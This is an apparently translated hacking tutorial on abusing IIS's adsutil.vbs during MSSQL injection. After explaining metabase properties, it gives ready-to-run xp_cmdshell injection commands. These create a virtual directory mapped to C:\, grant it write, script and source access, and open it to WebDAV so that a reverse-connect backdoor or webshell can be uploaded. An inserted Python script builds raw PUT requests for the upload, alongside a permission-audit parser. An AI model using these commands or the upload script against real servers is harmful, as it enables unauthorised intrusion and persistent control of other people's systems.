The use of adsutil.vbs in script attacks

Source: Internet
Author: User
Tags: iis, administration, metabase
1. Brief Introduction
What is adsutil.vbs? Anyone who has administered IIS will know it. It is a script shipped with IIS for managing IIS from the command line, located in %systemdrive%\Inetpub\AdminScripts. On my machine it is 95,426 bytes, and a script that large has correspondingly powerful functions: basically it is an "Internet Information Services Manager" for the command line. (On Windows 2000, %systemdrive%\Inetpub\AdminScripts holds more than twenty VBS management scripts; on Windows 2003 only adsutil.vbs is left in that directory, which shows how much ground it covers.)
Where adsutil.vbs is mentioned, the metabase must be mentioned too. This file is the central IIS configuration store: every IIS setting is kept in it, and both the IIS manager and adsutil.vbs show you their information by reading it. (On IIS 5 it is %systemroot%\system32\inetsrv\MetaBase.bin; on IIS 6 the same store is kept as MetaBase.xml in the same directory. The paths and property names below are the same for both.) The metabase is organised much like the Registry, as a tree. The IIS manager and adsutil.vbs address nodes in that tree through an ADsPath, which starts with IIS://; localhost stands for the local server and W3SVC for the web service. For example, IIS://localhost/W3SVC/1 is the first web site on the local server, and IIS://localhost/W3SVC/1/Root/vdir is the virtual directory vdir under the root of the first web site.
With this background, let's go back to adsutil.vbs and look at how it is used:

C:\Inetpub\AdminScripts>cscript adsutil.vbs   // do not forget the script host, cscript.exe
Microsoft (R) Windows Script Host Version 5.6
Copyright (C) Microsoft Corporation 1996-2001. All rights reserved.

Usage:
        ADSUTIL.VBS <cmd> [<path> [<value>]]

Description:
IIS administration utility that enables the configuration of metabase properties.

Supported Commands:   // the supported commands; this is the most important part
        GET, SET, ENUM, DELETE, CREATE, COPY,
        APPCREATEINPROC, APPCREATEOUTPROC, APPCREATEPOOLPROC, APPDELETE, APPUNLOAD, APPGETSTATUS

Samples:   // a few simple examples
        adsutil.vbs GET W3SVC/1/ServerBindings   // show the bindings (port) of the first web site. W3SVC/1 is short for IIS://localhost/W3SVC/1 and ServerBindings is one of its properties; the same applies below.
        adsutil.vbs SET W3SVC/1/ServerBindings ":81:"   // set the port of the first web site to 81
        adsutil.vbs CREATE W3SVC/1/Root/MyVdir "IIsWebVirtualDir"   // create the virtual directory MyVdir under the root of the first web site; "IIsWebVirtualDir" is the node type (KeyType)
        adsutil.vbs START_SERVER W3SVC/1   // start the first web site
        adsutil.vbs ENUM /P W3SVC   // list all sites under the web service

For extended help type:
        adsutil.vbs HELP   // type this for the full help; I won't reproduce it here (so nobody can say I am padding for a fee), check it yourself

The text after "//" is commentary I added (the same below).
The commonly used adsutil.vbs commands are GET, SET, ENUM, DELETE and CREATE. One by one:
GET reads one property of a node (a site or directory). SET writes a property. ENUM also reads properties, but it dumps every property set on the node at once, which for a typical directory runs to several screens; it takes an optional /P switch, and with /P it lists only the child nodes (the virtual directories under that node) instead of the properties. DELETE removes a virtual directory and CREATE makes one. There are also START_SERVER, STOP_SERVER, PAUSE_SERVER and CONTINUE_SERVER, which start, stop, pause and resume a web site.
The properties of a virtual directory look roughly like this (I list only the ones likely to be used often, otherwise it gets too long):

KeyType                 : (STRING) "IIsWebVirtualDir"   // node type; (STRING) means a string-typed property
AppRoot                 : (STRING) "/LM/W3SVC/1/Root"   // metabase path of the application root
AppFriendlyName         : (STRING) "Default Application"   // application name
AppIsolated             : (INTEGER) 2   // whether the application runs in-process or out-of-process; a numeric property
HttpCustomHeaders       : (LIST) (1 Items)   // custom HTTP response headers
  "Powered by: www.wofeiwo.info"

HttpErrors              : (LIST) (42 Items)   // the page returned for each HTTP error code; configurable, omitted here
DefaultDoc              : (STRING) "default.htm,index.htm,default.asp,index.asp,default.php,index.php,default.aspx,index.aspx"   // default document names for the directory
Path                    : (STRING) "D:\FTP"   // physical path the directory maps to
AccessFlags             : (INTEGER) 513   // bitmask behind the Access* Booleans below: 513 = 0x201 = AccessRead (1) + AccessScript (512); setting any of the Booleans updates the corresponding bit, you do not normally set it directly
AccessExecute           : (BOOLEAN) False   // execute permission (EXE/DLL); a Boolean property
AccessSource            : (BOOLEAN) False   // script source access: together with AccessRead/AccessWrite it lets WebDAV clients read and write script files themselves
AccessRead              : (BOOLEAN) True   // read permission
AccessWrite             : (BOOLEAN) False   // write permission
AccessScript            : (BOOLEAN) True   // whether scripts (ASP etc.) may run in the directory
AccessNoRemoteExecute   : (BOOLEAN) False   // the AccessNoRemote* flags, when True, limit the matching permission to local requests only
AccessNoRemoteRead      : (BOOLEAN) False
AccessNoRemoteWrite     : (BOOLEAN) False
AccessNoRemoteScript    : (BOOLEAN) False
AccessNoPhysicalDir     : (BOOLEAN) False
ScriptMaps              : (LIST) (27 Items)   // application extension mappings
  ".asa,C:\WINDOWS\system32\inetsrv\asp.dll,5,GET,HEAD,POST,TRACE"
  ".asp,C:\WINDOWS\system32\inetsrv\asp.dll,5,GET,HEAD,POST,TRACE"
  ".aspx,C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\aspnet_isapi.dll,1,GET,HEAD,POST,DEBUG"
  ..................   // many more entries omitted here
AspEnableParentPaths    : (BOOLEAN) True
AppPoolId               : (STRING) "DefaultAppPool"   // application pool name
DontLog                 : (BOOLEAN) True   // True disables IIS logging for this directory
DirBrowseFlags          : (INTEGER) -1073741762   // bitmask behind the directory-browsing settings below, stored as a signed 32-bit value: 0xC000003E = EnableDirBrowsing (0x80000000) + EnableDefaultDoc (0x40000000) + the five DirBrowseShow* bits (0x02 to 0x20)
EnableDirBrowsing       : (BOOLEAN) True   // whether directory listing is allowed
DirBrowseShowDate       : (BOOLEAN) True   // this and the following control what a directory listing shows; the names speak for themselves
DirBrowseShowTime       : (BOOLEAN) True
DirBrowseShowSize       : (BOOLEAN) True
DirBrowseShowExtension  : (BOOLEAN) True
DirBrowseShowLongDate   : (BOOLEAN) True
EnableDefaultDoc        : (BOOLEAN) True   // whether the default document is served

The above is what cscript adsutil.vbs ENUM W3SVC/1/Root printed on my machine; run the same command and study the output yourself.
All of the above properties can be changed with SET. The form is:
cscript adsutil.vbs SET W3SVC/1/Root/<directory name>/<property name> <value>
For example: cscript adsutil.vbs SET W3SVC/1/Root/wofeiwo/AccessRead 1   // turn on read permission for the virtual directory wofeiwo under the first web site (Boolean properties accept 1/0 or True/False)
Or: cscript adsutil.vbs SET W3SVC/1/Root/wofeiwo/Path "C:\"   // map the directory to the physical path C:\
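To make the ENUM dump above usable rather than just readable, here is an added example (my own code, not from the article or from adsutil.vbs) that parses the ENUM output format, decodes the AccessFlags and DirBrowseFlags bitmasks into the named Boolean properties, checks that the two views agree, and reports the permission combinations that turn a virtual directory into an upload point. The two dumps inside it are constructed from the values the article shows (513 and -1073741762) and from the permissions the article sets later; the bit values are the IIS metabase MD_ACCESS_* and MD_DIRBROW_* constants.

```python
"""
Parse `cscript adsutil.vbs ENUM <path>` output for one virtual directory,
decode AccessFlags / DirBrowseFlags, and flag risky permission combinations.
Added example; not part of the original article or of adsutil.vbs.
"""
import re

# AccessFlags bits; each mirrors the Boolean property of the same name.
ACCESS_BITS = {
    "AccessRead": 0x1, "AccessWrite": 0x2, "AccessExecute": 0x4,
    "AccessSource": 0x10, "AccessScript": 0x200,
    "AccessNoRemoteWrite": 0x400, "AccessNoRemoteRead": 0x1000,
    "AccessNoRemoteExecute": 0x2000, "AccessNoRemoteScript": 0x4000,
    "AccessNoPhysicalDir": 0x8000,
}
# DirBrowseFlags bits; the metabase stores the mask as a signed 32-bit INTEGER,
# which is why the article's dump shows a negative number.
DIRBROWSE_BITS = {
    "DirBrowseShowDate": 0x2, "DirBrowseShowTime": 0x4, "DirBrowseShowSize": 0x8,
    "DirBrowseShowExtension": 0x10, "DirBrowseShowLongDate": 0x20,
    "EnableDefaultDoc": 0x40000000, "EnableDirBrowsing": 0x80000000,
}

# Constructed dump: the article's directory as dumped (read + script, listing on).
ARTICLE_DUMP = r'''
KeyType           : (STRING) "IIsWebVirtualDir"
HttpCustomHeaders : (LIST) (1 Items)
  "Powered by: www.wofeiwo.info"
Path              : (STRING) "D:\FTP"
AccessFlags       : (INTEGER) 513
AccessExecute     : (BOOLEAN) False
AccessSource      : (BOOLEAN) False
AccessRead        : (BOOLEAN) True
AccessWrite       : (BOOLEAN) False
AccessScript      : (BOOLEAN) True
DirBrowseFlags    : (INTEGER) -1073741762
EnableDirBrowsing : (BOOLEAN) True
EnableDefaultDoc  : (BOOLEAN) True
'''
# Constructed dump: the same directory after the article's SET commands.
AFTER_ATTACK_DUMP = r'''
KeyType           : (STRING) "IIsWebVirtualDir"
Path              : (STRING) "C:\"
AccessFlags       : (INTEGER) 531
AccessSource      : (BOOLEAN) True
AccessRead        : (BOOLEAN) True
AccessWrite       : (BOOLEAN) True
AccessScript      : (BOOLEAN) True
EnableDirBrowsing : (BOOLEAN) True
'''

PROP_RE = re.compile(r'^\s*(\w+)\s*:\s*\((\w+)\)\s*(.*)$')


def _convert(typ, val):
    if typ == "BOOLEAN":
        return val.lower() == "true"
    if typ == "INTEGER":
        return int(val)
    return val.strip('"')


def parse_enum(text):
    """Return {property: value}; LIST properties become Python lists of their quoted items."""
    props, current_list = {}, None
    for raw in text.splitlines():
        m = PROP_RE.match(raw)
        if m:
            name, typ, val = m.group(1), m.group(2).upper(), m.group(3).strip()
            if typ == "LIST":
                current_list = props[name] = []
            else:
                current_list = None
                props[name] = _convert(typ, val)
        elif current_list is not None and raw.strip().startswith('"'):
            current_list.append(raw.strip().strip('"'))
    return props


def decode_mask(value, table):
    """Names of the bits set in a mask, treating the value as unsigned 32-bit."""
    u = value & 0xFFFFFFFF
    return [name for name, bit in table.items() if u & bit]


def mask_matches_booleans(props, mask_name, table):
    """True if every Boolean property present agrees with its bit in the mask."""
    u = props[mask_name] & 0xFFFFFFFF
    return all(props[name] == bool(u & bit) for name, bit in table.items() if name in props)


def upload_risks(props):
    """Permission combinations that let a remote client drop and use files."""
    risks = []
    if props.get("AccessWrite"):
        if props.get("AccessScript") or props.get("AccessExecute"):
            risks.append("write + script/execute: an uploaded script runs on the server")
        if props.get("AccessSource"):
            risks.append("write + source access: WebDAV clients can read and replace script source")
        if props.get("EnableDirBrowsing"):
            risks.append("write + directory listing: uploaded files are easy to find")
    return risks


if __name__ == "__main__":
    for label, dump in (("as dumped", ARTICLE_DUMP), ("after SET", AFTER_ATTACK_DUMP)):
        p = parse_enum(dump)
        print(label, decode_mask(p["AccessFlags"], ACCESS_BITS), upload_risks(p))
```

Feed it the real output of cscript adsutil.vbs ENUM W3SVC/1/Root/<vdir> instead of the constructed dumps to audit a server; a directory with AccessWrite set together with AccessScript, AccessExecute or AccessSource is exactly the configuration the second half of this article creates.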
Now let's look at some practical examples.
2. Uses of adsutil.vbs
(1) A new approach to file upload during MSSQL injection
You may run into this during MSSQL injection: you have SA, so you can run commands (xp_cmdshell, sp_OACreate, a job, and so on), but the server sits on an intranet behind a bastion host with only port 80 published. 3389 is useless (you cannot reach the intranet), and none of the reverse-transfer tricks (TFTP, FTP, wget, exe2bat and the like) can get a Trojan onto the box. What then?
Amanl's classic "Squeeze the last drop of MSSQL blood" gives a good idea: use the VBS scripts under %systemdrive%\Inetpub\AdminScripts to create a new virtual directory whose physical path you choose. That way the absolute web path is known without guessing, and you can then write a database backup (BACKUP) or a temporary table (sp_makewebtask) into that directory, or simply echo a file into it, to get a shell.
The idea is sound. But anyone who has used getwebshell or nbupfile knows how low the success rate of BACKUP and sp_makewebtask is, and echo is no better: writing a file one line per query is asking for trouble, with special characters to escape at every turn.
We can improve on Amanl's idea. When we create the virtual directory we can also give it write permission, and with WebDAV we can then upload any file straight through IIS, not only text files. Upload a reverse-connect backdoor, run it through SA, and everything is done!
So:
EXEC master..xp_cmdshell 'cscript.exe %systemdrive%\Inetpub\AdminScripts\adsutil.vbs CREATE W3SVC/1/Root/wofeiwo "IIsWebVirtualDir"';--
EXEC master..xp_cmdshell 'cscript.exe %systemdrive%\Inetpub\AdminScripts\adsutil.vbs SET W3SVC/1/Root/wofeiwo/Path "C:\"';--
Special characters in these statements must be encoded for the injection point you are using (a single quote inside the T-SQL string literal, for instance, has to be doubled). Alternatively, run the commands through nbsi2. Note that adsutil.vbs writes the metabase, which needs administrative rights on the server, so this only works when the SQL Server service account has them (LocalSystem or a local Administrator).
This creates a virtual directory wofeiwo under the first web site, mapped to the root of C:. I then give it read and write permission and, to get a webshell, script permission as well:
EXEC master..xp_cmdshell 'cscript.exe %systemdrive%\Inetpub\AdminScripts\adsutil.vbs SET W3SVC/1/Root/wofeiwo/AccessRead 1';--
EXEC master..xp_cmdshell 'cscript.exe %systemdrive%\Inetpub\AdminScripts\adsutil.vbs SET W3SVC/1/Root/wofeiwo/AccessWrite 1';--
EXEC master..xp_cmdshell 'cscript.exe %systemdrive%\Inetpub\AdminScripts\adsutil.vbs SET W3SVC/1/Root/wofeiwo/AccessScript 1';--
Readers who have seen superhei's article on abusing IIS write permission may now want to build a raw HTTP request to upload files. There is a simpler way:
EXEC master..xp_cmdshell 'cscript.exe %systemdrive%\Inetpub\AdminScripts\adsutil.vbs SET W3SVC/1/Root/wofeiwo/EnableDirBrowsing 1';--
EXEC master..xp_cmdshell 'cscript.exe %systemdrive%\Inetpub\AdminScripts\adsutil.vbs SET W3SVC/1/Root/wofeiwo/AccessSource 1';--
With directory listing and script source access turned on, open IE, press Ctrl+O, type the URL of the virtual directory you just created, tick "Open as Web Folder" and click OK; the directory then appears as an ordinary folder you can drag files into. (On Windows Server 2003 / IIS 6 the WebDAV web service extension is prohibited by default; unless it has been allowed, the Web Folder view will not open, whatever the Access* flags say.)
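For the case where the Web Folder trick is not available (no IE at hand, or you want to script the upload), here is an added example, my own code and not from the article, of the raw HTTP exchange the article alludes to: an OPTIONS request to confirm the directory advertises WebDAV and allows PUT, then a PUT of the file. The host name, port and directory path are hypothetical, and the response bytes used to exercise the parser are constructed to match what a WebDAV-enabled IIS directory returns.

```python
"""
Probe a virtual directory for WebDAV PUT and upload a file with a hand-built
HTTP request. Added example; not part of the original article.
Host, port and path are hypothetical placeholders.
"""
import socket


def build_options_request(host, path):
    """OPTIONS request; IIS answers with DAV: and Allow: headers when WebDAV is on."""
    return (f"OPTIONS {path} HTTP/1.1\r\nHost: {host}\r\n"
            f"Connection: close\r\n\r\n").encode()


def build_put_request(host, path, body):
    """PUT request carrying the file body; path is the target URL inside the vdir."""
    return (f"PUT {path} HTTP/1.1\r\nHost: {host}\r\n"
            f"Content-Length: {len(body)}\r\nConnection: close\r\n\r\n").encode() + body


def parse_response(raw):
    """Split a raw HTTP response into (status code, lower-cased headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return status, headers, body


def dav_put_allowed(options_response):
    """True when the OPTIONS reply has a DAV header and lists PUT as allowed."""
    status, headers, _ = parse_response(options_response)
    allowed = {m.strip().upper() for m in headers.get("allow", "").split(",")}
    return status == 200 and "dav" in headers and "PUT" in allowed


def send(host, port, request, timeout=10):
    """Send one request over a fresh TCP connection and return the whole reply."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(request)
        chunks = []
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            chunks.append(chunk)
    return b"".join(chunks)


def upload(host, port, path, body):
    """Probe, then PUT; returns the PUT status (201 on a new file, 200/204 on overwrite)."""
    if not dav_put_allowed(send(host, port, build_options_request(host, path))):
        raise RuntimeError("directory does not advertise WebDAV PUT; check AccessWrite and the WebDAV extension")
    status, _, _ = parse_response(send(host, port, build_put_request(host, path, body)))
    return status


if __name__ == "__main__":
    # Hypothetical target; prints the request that upload() would send.
    print(build_put_request("target.example", "/wofeiwo/test.txt", b"hello").decode())
```

Checking the OPTIONS reply first matters because AccessWrite alone is not enough: if the reply carries no DAV header, the WebDAV component is absent or disabled on that server and the PUT will be refused regardless of the flags set through adsutil.vbs.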
